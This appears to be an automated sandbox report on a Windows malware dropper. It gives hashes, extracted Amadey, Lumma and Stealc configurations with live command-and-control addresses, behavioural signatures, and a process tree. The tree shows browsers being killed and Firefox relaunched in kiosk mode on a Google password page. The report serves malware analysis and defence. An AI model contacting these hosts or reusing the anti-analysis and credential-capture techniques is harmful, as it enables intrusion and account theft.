Analysis

  • max time kernel
    143s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-12-2024 20:14

General

  • Target

    191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe

  • Size

    3.6MB

  • MD5

    3bc888b63247898f10e270e0711ccca2

  • SHA1

    342efb0b96606ddbe130fb362c24aa1661a72f33

  • SHA256

    191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a

  • SHA512

    0684c613bbbef78ccd2c127e305ad9115a4623e8a3617a1a2d88c925725fb1817674f7f5b9c5394e60759c655660a5723f8a07d80bd369e5951970e1b3d5f5a1

  • SSDEEP

    98304:b5TOfP9BOxle7zesk/WLKmLNi4ZBjUYnFVzkBhOZOAj/P:YQlEesaJmLNFPj9r4uOOP

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 26 IoCs
  • Identifies Wine through registry keys 2 TTPs 9 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 37 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 19 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3404
      • C:\Users\Admin\AppData\Local\Temp\191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe
        "C:\Users\Admin\AppData\Local\Temp\191d113401af31884b55a8db94126e59338e2e10d0b212b6fd0a2d7f55d1656a.exe"
        2⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p76f5.exe
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p76f5.exe
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:560
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1712
            • C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe
              "C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe"
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of WriteProcessMemory
              PID:4580
              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callmobile.exe
                C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\callmobile.exe
                6⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4856
            • C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe
              "C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4452
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1580
                6⤵
                • Program crash
                PID:1516
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1592
                6⤵
                • Program crash
                PID:2912
            • C:\Users\Admin\AppData\Local\Temp\1013261001\ed5d6d0073.exe
              "C:\Users\Admin\AppData\Local\Temp\1013261001\ed5d6d0073.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4728
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1612
                6⤵
                • Program crash
                PID:1952
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1592
                6⤵
                • Program crash
                PID:2060
            • C:\Users\Admin\AppData\Local\Temp\1013262001\012ef94453.exe
              "C:\Users\Admin\AppData\Local\Temp\1013262001\012ef94453.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4980
            • C:\Users\Admin\AppData\Local\Temp\1013263001\af21b79d53.exe
              "C:\Users\Admin\AppData\Local\Temp\1013263001\af21b79d53.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2536
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                6⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2940
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                6⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4400
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                6⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3428
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                6⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3432
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                6⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1548
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1804
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                  7⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:4560
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1952 -prefMapHandle 1944 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8beafafa-1ef2-4480-8bef-9376085a6b94} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" gpu
                    8⤵
                      PID:3948
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2508 -parentBuildID 20240401114208 -prefsHandle 2484 -prefMapHandle 2480 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0469ea3-c3bc-42b8-bc7c-ddc23bc1da61} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" socket
                      8⤵
                        PID:4596
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2848 -childID 1 -isForBrowser -prefsHandle 2876 -prefMapHandle 3032 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {09427865-b2ef-4aee-bea7-035d3c38d444} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab
                        8⤵
                          PID:4312
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3816 -childID 2 -isForBrowser -prefsHandle 3836 -prefMapHandle 3832 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f6efcb2-1f2f-4615-a4fe-d5f212244c3f} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab
                          8⤵
                            PID:3560
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4544 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4796 -prefMapHandle 2904 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7390a76d-9e08-419b-ba71-970c1a5c2ce5} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" utility
                            8⤵
                            • Checks processor information in registry
                            PID:6624
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4428 -childID 3 -isForBrowser -prefsHandle 5296 -prefMapHandle 5292 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a48e308e-b2ac-45d8-af30-b22059905a00} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab
                            8⤵
                              PID:7092
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5216 -childID 4 -isForBrowser -prefsHandle 5416 -prefMapHandle 5420 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {58eea69a-8a26-48ac-b9b1-87b3b0d7d93d} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab
                              8⤵
                                PID:7104
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 5 -isForBrowser -prefsHandle 5576 -prefMapHandle 5580 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8514e754-163a-4d19-bccd-71d0b6259567} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab
                                8⤵
                                  PID:7128
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6056 -childID 6 -isForBrowser -prefsHandle 6072 -prefMapHandle 6068 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79842127-d493-4f4e-9f63-4b216927d3db} 4560 "\\.\pipe\gecko-crash-server-pipe.4560" tab
                                  8⤵
                                    PID:6748
                            • C:\Users\Admin\AppData\Local\Temp\1013264001\5dd3e2b4f1.exe
                              "C:\Users\Admin\AppData\Local\Temp\1013264001\5dd3e2b4f1.exe"
                              5⤵
                              • Modifies Windows Defender Real-time Protection settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:528
                            • C:\Users\Admin\AppData\Local\Temp\1013265001\sS6lYim.exe
                              "C:\Users\Admin\AppData\Local\Temp\1013265001\sS6lYim.exe"
                              5⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:544
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A709.tmp\A70A.tmp\A70B.bat C:\Users\Admin\AppData\Local\Temp\1013265001\sS6lYim.exe"
                                6⤵
                                  PID:5336
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
                                    7⤵
                                    • Enumerates system info in registry
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    • Suspicious use of SendNotifyMessage
                                    PID:5532
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffaef4acc40,0x7ffaef4acc4c,0x7ffaef4acc58
                                      8⤵
                                        PID:5572
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2012 /prefetch:2
                                        8⤵
                                          PID:6020
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1956,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2124 /prefetch:3
                                          8⤵
                                            PID:6028
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2508 /prefetch:8
                                            8⤵
                                              PID:6116
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1
                                              8⤵
                                                PID:1152
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1
                                                8⤵
                                                  PID:664
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4596,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4644 /prefetch:8
                                                  8⤵
                                                    PID:3920
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:8
                                                    8⤵
                                                      PID:4772
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4724,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4888 /prefetch:8
                                                      8⤵
                                                        PID:720
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4640,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:8
                                                        8⤵
                                                          PID:2128
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4480,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:8
                                                          8⤵
                                                            PID:3556
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4644 /prefetch:8
                                                            8⤵
                                                              PID:6904
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4876,i,14311109646719613636,5462455354385218758,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:2
                                                              8⤵
                                                                PID:5472
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
                                                              7⤵
                                                              • Enumerates system info in registry
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              PID:5540
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x170,0x174,0x178,0x90,0x17c,0x7ffaef2b46f8,0x7ffaef2b4708,0x7ffaef2b4718
                                                                8⤵
                                                                  PID:5588
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2004 /prefetch:2
                                                                  8⤵
                                                                    PID:6272
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
                                                                    8⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:6280
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2440 /prefetch:8
                                                                    8⤵
                                                                      PID:6308
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                                      8⤵
                                                                        PID:6648
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
                                                                        8⤵
                                                                          PID:6660
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1988,2028102202890162561,11043132409859261983,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
                                                                          8⤵
                                                                            PID:4876
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
                                                                          7⤵
                                                                            PID:5548
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
                                                                              8⤵
                                                                              • Checks processor information in registry
                                                                              PID:5564
                                                                      • C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\1013266001\main.exe"
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:5768
